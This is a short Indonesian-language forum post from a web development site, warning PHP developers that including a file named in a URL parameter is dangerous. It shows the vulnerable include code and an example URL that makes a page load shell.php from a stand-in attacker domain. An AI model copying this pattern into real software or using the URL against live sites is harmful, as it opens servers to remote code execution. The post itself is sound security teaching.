2076 Posts in 483 Topics- by 820 Members - Latest Member: akunp2

Web Development and Design Forum - dremi.info > Webmaster > PHP Security > PHP Inject [fatal bad include code]
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: PHP Inject [fatal bad include code]  (Read 1165 times)
webmaster
Administrator
phpBB Guru
*****
Offline Offline

Posts: 924


hairulazami
View Profile WWW
« on: August 16, 2008, 02:57:46 PM »
PHP Inject [fatal bad include code]

menggunakan include pada variable harus hati!!!, berbahaya

Bad PHP Code:

Code:
$ambildata = $_GET['ambildata'];
include ($ambildata);

dengan demikian script diatas mengijinkan user untk menginclude file apa saja ke dalam halaman web via URL

let's see

Code:

http://domain.com/page=2&ambildata=http://baddomain.com/shell.php



file shell.php bakalan diinclude dalam halaman juga !!!!
« Last Edit: January 01, 1970, 07:00:00 AM by webmaster » Logged

Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to: